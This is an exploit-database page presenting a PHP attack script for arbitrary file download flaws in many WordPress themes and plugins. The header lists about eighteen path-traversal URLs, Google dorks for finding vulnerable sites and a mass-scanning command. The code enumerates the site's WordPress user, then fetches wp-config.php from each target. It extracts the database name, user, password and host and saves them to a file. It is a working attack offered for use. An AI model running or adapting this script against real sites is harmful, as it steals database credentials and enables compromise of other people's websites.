WordPress Themes download.php File Disclosure



EKU-ID: 4462 CVE: OSVDB-ID:
Author: Cleiton Pinheiro Published: 2014-12-25 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/php -q
<?php
#===============================================================================
# *NAME*:                 Wordpress A.F.D Verification/ INURL - BRASIL
# *TIPE*:                   Arbitrary File Download
# *Tested on*:            Linux
# *EXECUTE*:           php exploit.php www.target.gov.us
# *OUTPUT*:             WORDPRES_A_F_D.txt
# *AUTOR*:               Cleiton Pinheiro / NICK: GoogleINURL
# *EMAIL*:                 inurllbr@gmail.com
# *Blog*:                   http://blog.inurl.com.br
# *Twitter*:                https://twitter.com/googleinurl
# *Fanpage*:             https://fb.com/InurlBrasil
# *GIT: *                   https://github.com/googleinurl
# *YOUTUBE  *
https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
#
#
------------------------------------------------------------------------------
#  Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt
--comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
#
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#
------------------------------------------------------------------------------
#
# *PRINT:* http://i.imgur.com/45BFlNe.png
#
------------------------------------------------------------------------------
#
# *Description:*
# This exploit allows the attacker to exploit the flaw Arbitrary File
Download in dozens of wordpress themes.
# Through regular expressions, the script will perform the check for each
target url checking your wp-config.php file
# Regular expressions:
# preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
# preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
# preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
# preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
# preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);
#
------------------------------------------------------------------------------
#
# *Usage info:*
# php script.php www.target.gov.us
# File download wp-config.php
# Failure consists of exploring a parameter $_GET
# The following fields are exploited for Arbitrary File Download
#
# *Check failure Arbitrary File Download*
#
# /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# /wp-content/force-download.php?file=../wp-config.php
#
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
# /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
# /wp-content/themes/markant/download.php?file=../../wp-config.php
# /wp-content/themes/yakimabait/download.php?file=./wp-config.php
# /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
# /wp-content/themes/felis/download.php?file=../wp-config.php
#
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
#
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
# /wp-content/themes/epic/includes/download.php?file=wp-config.php
#
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
#
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
#
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
#
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
# /wp-content/themes/lote27/download.php?download=../../../wp-config.php
#
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
#
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
#
#
# *D O R K'S:*
#
------------------------------------------------------------------------------
#
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork:: "Index of" & /wp-content/themes/ultimatum
#
------------------------------------------------------------------------------
#
# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork:: "Index of" & /wp-content/themes/medicate/
#
------------------------------------------------------------------------------
#
# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork:: "Index of" & /wp-content/themes/Centum/
#
------------------------------------------------------------------------------
#
# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork:: "Index of" & /wp-content/themes/Avada/
#
------------------------------------------------------------------------------
#
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork:: "Index of" & /wp-content/themes/striking_r/
#
------------------------------------------------------------------------------
#
# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
# Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
#
------------------------------------------------------------------------------
#
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator
# Vendor Homepage::
http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
#
------------------------------------------------------------------------------
#
# WordPress cuckootap Theme Arbitrary File Download
# Google Dork:: "Index of" & /wp-content/themes/cuckootap/
# Vendor Homepage:: http://www.cuckoothemes.com/
#
------------------------------------------------------------------------------
#
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
#
------------------------------------------------------------------------------
#
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork:: "Index of" & /wp-content/themes/ultimatum
#
------------------------------------------------------------------------------
#
# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork:: "Index of" & /wp-content/themes/medicate/
#
------------------------------------------------------------------------------
#
# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork:: "Index of" & /wp-content/themes/Centum/
#
------------------------------------------------------------------------------
#
# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork:: "Index of" & /wp-content/themes/Avada/
#
------------------------------------------------------------------------------
#
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork:: "Index of" & /wp-content/themes/striking_r/
#
------------------------------------------------------------------------------
#
# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
# Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
#
------------------------------------------------------------------------------
#
# WordPress Trinity Theme Arbitrary File Download
# Vendor Homepage:: https://churchthemes.net/themes/trinity/
# Google Dork:: "Index of" & /wp-content/themes/trinity/
#
------------------------------------------------------------------------------
#
# WordPress Lote27 Theme Arbitrary File Download
# Google Dork:: "Index of" & /wp-content/themes/lote27/
#
------------------------------------------------------------------------------
#
# WordPress Revslider Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Google Dork:: wp-admin & inurl:revslider_show_image
#
------------------------------------------------------------------------------
#
#===============================================================================

$banner = "
  _____
 (_____)    ____ _   _ _    _ _____  _                 ____
 _ _
 (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \
 (_) |
  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __ __ _ ___
_| |
   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/ _` / __|
| |
   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | | (_| \__ \
| |
  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|
 \__,_|___/_|_|
  \n\033[1;37m0xNeither war between hackers, nor peace for the
system.\033[0m\r
";

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

function __plus() {

    ob_flush();
    flush();
}

print empty($argv[1]) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php
exploit.php www.target.gov.us\n") : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://
{$argv[1]}";
!filter_var($argv[1], FILTER_VALIDATE_URL) ? exit("{$banner}0x[ERROR]: SET
URL / Execute: php exploit.php www.target.gov.us\n") : NULL;

print "\r\n{$banner}0x[EXPLOIT NAME]: WORDPRESS A.F.D / INURL - BRASIL";
print
"\n------------------------------------------------------------------------------------------------------------------";
__plus();
$users = file_get_contents("{$argv[1]}/?author=1");
__plus();
preg_match('/<title>(.*?)<\/title>/si', $users, $user);
$wpuser = explode('|', $user[1]);
$headers = get_headers($argv[1], 1);
__plus();
print "\n0x " . date("h:m:s") . " [INFO][COD]:: ";
print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
print "\n0x " . date("h:m:s") . " [INFO][Server]:: ";
is_array($headers['Server']) ? print_r($headers['Server'][0]) :
print_r($headers['Server']);
print "\n0x " . date("h:m:s") . " [INFO][X-Pingback]:: ";
is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) :
print_r($headers['X-Pingback']);
print "\n0x " . date("h:m:s") . " [INFO][X-Powered-By]:: ";
is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) :
print_r($headers['X-Powered-By']);
print_r("\n0x " . date("h:m:s") . " [INFO][TARGET]:: {$argv[1]} | [WP
USER]:: " . str_replace("\n", '', $wpuser[0]));
print "\n0x " . date("h:m:s") . " [INFO][OUTPUT FILE]::
WORDPRESS_A_F_D.txt\n";
__plus();

__request($argv[1],
'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php');

__request($argv[1], '/wp-content/force-download.php?file=../wp-config.php');

__request($argv[1],
'/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php');

__request($argv[1],
'/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php');

__request($argv[1],
'/wp-content/themes/markant/download.php?file=../../wp-config.php');

__request($argv[1],
'/wp-content/themes/yakimabait/download.php?file=./wp-config.php');

__request($argv[1],
'/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/felis/download.php?file=../wp-config.php');

__request($argv[1],
'/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/epic/includes/download.php?file=wp-config.php');

__request($argv[1],
'/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/lote27/download.php?download=../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php');

__request($argv[1],
'/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php');

function __request($url, $plugin) {

    $objcurl = curl_init();
    $caminho = NULL;
    $status = array();

    curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1
(compatible; MSIE 5.01; Linux 5.0)");
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
    $corpo = curl_exec($objcurl);

    if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {

        return __request($url, "{$plugin}&file=" .
str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
    }
    __plus();

    if (preg_match("#DB_NAME#i", $corpo) || preg_match("#readfile(#i",
$corpo)) {

//-----------------------------------------------------------------------------
        preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
        preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
        preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
        preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
        preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
//-----------------------------------------------------------------------------
        __plus();
        $res =
"\n------------------------------------------------------------------------------------------------------------------\n\033[0;32m0x
" . date("h:m:s") . " [INFO][VULN]::    \033[1;37m [ " . date("d-m-Y
H:i:s") . " ]\n";
        $res.= ("\033[0;32m0x " . date("h:m:s") . "
[INFO][VULN][DB]::\033[1;37m " . $status['DB_NAME'][0][0]);
        $res.= ("::" . $status['DB_USER'][0][0]);
        $res.= ("::" . $status['DB_PASSWORD'][0][0]);
        $res.= ("::" . $status['DB_HOST'][0][0]);
        $res.= ("::" . $status['DB_CHARSET'][0][0]);
        $res.= "\n\033[0;32m0x " . date("h:m:s") . "
[INFO][VULN][URL]::\033[1;37m{$url}{$plugin}\033[0m";
        $res.=
"\n------------------------------------------------------------------------------------------------------------------\n\033[0m";
        print $res;
        $res = str_replace('', '', str_replace('', '',
str_replace('', '', $res)));
        file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
        __plus();
    } else {

        print "\n\033[1;31m0x " . date("h:m:s") . " [INFO][NOT
VULN]::\033[1;37m {$url}{$plugin} \n\033[0m";
    }
    curl_close($objcurl);
    __plus();
}